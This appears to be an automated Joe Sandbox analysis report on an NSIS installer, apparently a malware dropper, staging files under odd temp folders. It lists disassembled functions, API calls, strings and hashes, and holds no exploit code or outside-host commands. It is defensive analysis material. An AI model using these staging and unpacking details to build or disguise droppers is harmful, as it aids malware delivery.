                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                • String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\temp_executable.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Sortkridts Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                • API String ID: 1152188737-102299959
                                • Opcode ID: 0a6dd509e07941f5201f59f66d64ee85ec59a5133d30cf212f22df12b7490388
                                • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                • Opcode Fuzzy Hash: 0a6dd509e07941f5201f59f66d64ee85ec59a5133d30cf212f22df12b7490388
                                • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E
                                Function 004066F4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155filestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 531 4066f4-40671d call 406613 534 406736-406740 531->534 535 40671f-406731 DeleteFileW 531->535 537 406742-406744 534->537 538 406753-406766 call 406af5 534->538 536 4068b5-4068be 535->536 539 4068a4-4068aa 537->539 540 40674a-40674d 537->540 545 406776-406777 call 406ceb 538->545 546 406768-406774 lstrcatW 538->546 544 4068b4 539->544 540->538 542 40686d-406875 call 4065aa 540->542 542->544 553 406877-40688b call 406531 call 406560 542->553 544->536 548 40677c-406781 545->548 546->548 551 406783-40678b 548->551 552 40678d-406793 lstrcatW 548->552 551->552 555 406795-4067b8 lstrlenW FindFirstFileW 551->555 552->555 567 4068ac-4068af call 405d15 553->567 568 40688d-40688f 553->568 556 406856-40685b 555->556 557 4067be-4067c0 555->557 556->544 561 40685d-40686b 556->561 559 4067c1-4067c6 557->559 562 4067c8-4067ce 559->562 563 4067df-4067f2 call 406af5 559->563 561->539 561->542 565 4067d0-4067d5 562->565 566 406838-406849 FindNextFileW 562->566 576 4067f4-4067fb 563->576 577 406806-40680f call 406560 563->577 565->563 570 4067d7-4067dd 565->570 566->559 573 40684f-406850 FindClose 566->573 567->544 568->539 571 406891-4068a2 call 405d15 call 406218 568->571 570->563 570->566 571->544 573->556 576->566 579 4067fd-4067ff call 4066f4 576->579 586 406830-406833 call 405d15 577->586 587 406811-406813 577->587 585 406804 579->585 585->566 586->566 588 406815-406826 call 405d15 call 406218 587->588 589 406828-40682e 587->589 588->566 589->566
                                APIs
                                  • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                  • Part of subcall function 00406613: GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                • DeleteFileW.KERNELBASE(?,?,00000000,76073420,?), ref: 00406720
                                • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,76073420,?), ref: 00406772
                                • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,76073420,?), ref: 00406793
                                • lstrlenW.KERNEL32(?), ref: 00406796
                                • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                • FindClose.KERNEL32(00000000), ref: 00406850
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                • String ID: \*.*
                                • API String ID: 2636146433-1173974218
                                • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                Function 004065AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                • FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: HvB
                                • API String ID: 2295610775-1619000230
                                • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD
                                Function 00405A19 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 225stringregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 146 405a19-405a34 call 4068c1 149 405a36-405a46 call 4065fa 146->149 150 405a48-405a7e call 406952 146->150 159 405aa1-405aca call 40595a call 406613 149->159 155 405a80-405a91 call 406952 150->155 156 405a96-405a9c lstrcatW 150->156 155->156 156->159 164 405ad0-405ad5 159->164 165 405b62-405b6a call 406613 159->165 164->165 166 405adb-405b04 call 406952 164->166 171 405b78-405ba6 LoadImageW 165->171 172 405b6c-405b73 call 405e95 165->172 166->165 173 405b06-405b0c 166->173 175 405c25-405c2d call 401533 171->175 176 405ba8-405bd3 RegisterClassW 171->176 172->171 177 405b0e-405b1c call 4065d1 173->177 178 405b1f-405b2d lstrlenW 173->178 189 405c33-405c3e call 40595a 175->189 190 405cdf-405ce1 175->190 179 405bd5-405bd7 176->179 180 405bdc-405c20 SystemParametersInfoW CreateWindowExW 176->180 177->178 183 405b55-405b5d call 406531 call 406af5 178->183 184 405b2f-405b3d lstrcmpiW 178->184 185 405ce2-405ce9 179->185 180->175 183->165 184->183 188 405b3f-405b49 GetFileAttributesW 184->188 193 405b4b-405b4d 188->193 194 405b4f-405b50 call 406ceb 188->194 199 405c44-405c5e ShowWindow call 406179 189->199 200 405cc6-405cce call 40583f 189->200 190->185 193->183 193->194 194->183 207 405c60-405c65 call 406179 199->207 208 405c6a-405c7b GetClassInfoW 199->208 205 405cd0-405cd6 200->205 206 405cea-405cec call 401533 200->206 205->190 209 405cd8-405cda call 401533 205->209 215 405cf1 206->215 207->208 212 405c93-405cc4 DialogBoxParamW call 401533 call 403cd3 208->212 213 405c7d-405c91 GetClassInfoW RegisterClassW 208->213 209->190 212->185 213->212 215->215
                                APIs
                                  • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                  • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                • lstrcatW.KERNEL32(1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,76073420,00000000,76073170), ref: 00405A9C
                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                • GetFileAttributesW.KERNEL32(Call), ref: 00405B40
                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising), ref: 00405B89
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-2089972381
                                • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D
                                Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441stringtimesleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 220 40154a-4015bd 221 402ea1 220->221 222 4015c3-4015c7 220->222 242 402ea5 221->242 223 4016c1-4016cf 222->223 224 4017c2-401e9e call 40303e call 4065aa 222->224 225 401684-4016aa 222->225 226 4015e6-4015ee 222->226 227 4018cb-4018d4 call 40303e call 406a31 222->227 228 40160c-40160d 222->228 229 4015ce-4015d0 222->229 230 4016ef-4016fb call 40303e SetFileAttributesW 222->230 231 4016af-4016bc call 4065fa 222->231 232 40182f-40184b call 40303e GetFullPathNameW 222->232 233 401711-401728 call 40303e call 406ba0 222->233 234 401633-40163a SetForegroundWindow 222->234 235 4017d3-4017f6 call 40303e * 3 MoveFileW 222->235 236 4015d5-4015d6 222->236 237 401618-40162e call 403002 Sleep 222->237 238 4015f9-401602 call 4030fd call 401399 222->238 239 40189b-4018b8 call 40303e SearchPathW 222->239 240 4018de-401904 call 40303e call 406dde 222->240 241 40163f-401645 222->241 255 4016d1-4016d5 ShowWindow 223->255 256 4016d9-4016e0 223->256 312 401bb2-401bb6 224->312 313 401ea4-401ea8 224->313 253 402ead-402eb7 225->253 259 4015f0-4015f7 PostQuitMessage 226->259 260 4015dc-4015e1 226->260 296 4018d9 227->296 246 40160e-401613 call 405d15 228->246 229->253 291 401701-401703 230->291 231->221 289 401857-40185d 232->289 290 40184d-401855 232->290 304 401784-40178e 233->304 305 40172a-40173f call 4065d1 233->305 234->221 321 401804-401808 235->321 322 4017f8-4017ff 235->322 257 4015d7 call 405d15 236->257 237->221 294 401607 238->294 239->221 283 4018be-4018c6 239->283 307 401906-40190c call 406af5 240->307 308 40190e-401920 call 406af5 call 406531 lstrcatW 240->308 250 401671-40167f 241->250 251 401647 241->251 247 402eab 242->247 246->221 247->253 250->221 272 401657-40166c call 403002 251->272 273 401649-401650 251->273 255->256 256->221 276 4016e6-4016ea ShowWindow 256->276 257->260 259->260 260->253 272->221 273->272 276->221 283->242 300 40187b 289->300 301 40185f-401862 289->301 299 40187f-401883 290->299 291->221 302 401709-40170c 291->302 294->253 296->291 299->242 310 401889-401896 GetShortPathNameW 299->310 300->299 301->300 309 401864-40186c call 4065aa 301->309 302->242 317 401790-4017ab call 405d15 call 406af5 SetCurrentDirectoryW 304->317 318 4017bb-4017bd 304->318 327 401741-401745 305->327 328 401758-401759 call 405df9 305->328 330 401925-40192d call 406d18 307->330 308->330 309->290 333 40186e-401876 call 406af5 309->333 310->242 312->253 313->253 317->221 351 4017b1-4017b6 317->351 318->246 321->302 329 40180e-401816 call 4065aa 321->329 322->246 327->328 334 401747-40174e call 4064d7 327->334 343 40175e-401760 328->343 329->302 347 40181c-40182a call 406218 329->347 350 40192e-401931 330->350 333->300 334->328 352 401750-401756 call 405e19 334->352 348 401762-401767 343->348 349 401775-40177e 343->349 347->246 354 401774 348->354 355 401769-401772 GetFileAttributesW 348->355 349->305 356 401780 349->356 357 401933-40193d call 4065aa 350->357 358 401964-401966 350->358 351->221 352->343 354->349 355->349 355->354 356->304 369 401950-401960 357->369 370 40193f-40194e CompareFileTime 357->370 362 401968-401969 call 406b78 358->362 363 40196e-401989 call 4068f6 358->363 362->363 371 401a18-401a49 call 405d15 call 403148 363->371 372 40198f-401991 363->372 369->358 370->369 385 401a52-401a5a SetFileTime 371->385 386 401a4b-401a50 371->386 373 401993-4019df call 406af5 * 2 call 405e95 call 406af5 call 406a83 372->373 374 4019fd-401a13 call 405d15 372->374 373->350 403 4019e5-4019e8 373->403 374->242 388 401a60-401a6d CloseHandle 385->388 386->385 386->388 388->221 390 401a73-401a76 388->390 392 401a78-401a87 call 405e95 lstrcatW 390->392 393 401a89-401a8c call 405e95 390->393 398 401a91-401a9c call 406a83 392->398 393->398 398->260 398->312 404 4019f2-4019f8 403->404 405 4019ea-4019ed 403->405 404->247 405->257
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                • SetForegroundWindow.USER32 ref: 00401634
                                • ShowWindow.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004016D3
                                • ShowWindow.USER32(00000000,?,?,?,00000000,00000000), ref: 004016E8
                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll), ref: 004017A3
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                • String ID: C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll$Call
                                • API String ID: 3895412863-3996529617
                                • Opcode ID: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                • Instruction ID: ebeff723cfbe9b45e3b0b0a6f17a4e6c0cbf30734010ce9bbeaf93aeca8f714e
                                • Opcode Fuzzy Hash: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                • Instruction Fuzzy Hash: 93D1F971614301ABC720BF26CD85D2B76A8EF85758F10463FF452B22E1DB7CD8029A6E
                                Function 004033C8 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 406 4033c8-403415 GetTickCount GetModuleFileNameW call 4068f6 409 403421-403451 call 406af5 call 406ceb call 406af5 GetFileSize 406->409 410 403417-40341c 406->410 418 403457 409->418 419 40354d-40355c call 403364 409->419 411 403620-403627 410->411 421 40345b-403481 call 40311b 418->421 424 403562-403564 419->424 425 40361b 419->425 429 403613-40361a call 403364 421->429 430 403487-40348e 421->430 427 403595-4035c5 GlobalAlloc call 403131 call 403148 424->427 428 403566-403585 call 403131 call 406923 424->428 425->411 427->425 454 4035c7-4035d9 427->454 428->425 456 40358b-40358f 428->456 429->425 434 403490-4034a9 call 40668f 430->434 435 40350f-403512 430->435 438 40351c-403522 434->438 453 4034ab-4034b3 434->453 437 403514-40351b call 403364 435->437 435->438 437->438 444 403524-403533 call 406e17 438->444 445 403537-40353f 438->445 444->445 445->421 448 403545-403549 445->448 448->419 453->438 455 4034b5-4034bd 453->455 458 4035e1-4035e4 454->458 459 4035db 454->459 455->438 460 4034bf-4034c7 455->460 456->425 456->427 462 4035e7-4035ef 458->462 459->458 460->438 461 4034c9-4034d1 460->461 461->438 463 4034d3-4034f2 461->463 462->462 464 4035f1-40360a SetFilePointer call 40668f 462->464 463->425 465 4034f8-4034fe 463->465 468 40360f-403611 464->468 465->448 467 403500-403509 465->467 467->438 469 40350b-40350d 467->469 468->411 469->438
                                APIs
                                • GetTickCount.KERNEL32 ref: 004033DB
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\temp_executable.exe,00000400,?,?,?,?,?), ref: 004033F7
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_executable.exe,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
                                • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\temp_executable.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                • API String ID: 2803837635-3442550413
                                • Opcode ID: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                • Instruction ID: a22a3d629960f4d7b6f8438a3768dc05bd31f949a9b5a180d7de35419ae1bb07
                                • Opcode Fuzzy Hash: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                • Instruction Fuzzy Hash: 2B51EE71640300AFD720AF21DD81B1B7AA8AB88719F10493FF985772E1C7398E458B6E
                                Function 00405E95 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 470 405e95-405e9e 471 405ea0-405eaf 470->471 472 405eb1-405ecc 470->472 471->472 473 405ee3-405eea 472->473 474 405ece-405ed9 472->474 476 405ef0-405ef3 473->476 477 4060de-4060e5 473->477 474->473 475 405edb-405edf 474->475 475->473 478 405ef4-405f02 476->478 479 4060f0 477->479 480 4060e7-4060ee call 406af5 477->480 482 405f08-405f13 478->482 483 4060d9-4060dd 478->483 481 4060f2-4060f8 479->481 480->481 485 4060b2 482->485 486 405f19-405f5d 482->486 483->477 488 4060c0 485->488 489 4060b4-4060be 485->489 490 405f63-405f74 486->490 491 40605d-406060 486->491 492 4060c3 488->492 489->492 495 405fb4-405fb7 490->495 496 405f76-405f94 call 406952 490->496 493 406062-406065 491->493 494 406096-406099 491->494 503 4060c5-4060d3 492->503 501 406075-40608c call 406af5 493->501 502 406067-406073 call 4065fa 493->502 497 4060a4-4060b0 lstrlenW 494->497 498 40609b-40609f call 405e95 494->498 499 405fc7-405fca 495->499 500 405fb9-405fc5 GetSystemDirectoryW 495->500 505 405f99-405fa2 496->505 497->503 498->497 508 405fda-405fe2 499->508 509 405fcc-405fd8 GetWindowsDirectoryW 499->509 507 406035 500->507 501->497 523 40608e-406094 call 406d18 501->523 502->497 503->478 503->483 512 406039-40603e 505->512 513 405fa8-405faf call 405e95 505->513 507->512 514 405fe4-405fed 508->514 515 405ff9-40600f SHGetSpecialFolderLocation 508->515 509->507 518 406040-406043 512->518 519 406051-40605b call 406d18 512->519 513->512 527 405ff5-405ff7 514->527 521 406011-40602a SHGetPathFromIDListW CoTaskMemFree 515->521 522 40602c-406033 515->522 518->519 524 406045-40604b lstrcatW 518->524 519->497 521->507 521->522 522->507 522->508 523->497 524->519 527->507 527->515
                                APIs
                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FBF
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Sortkridts Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
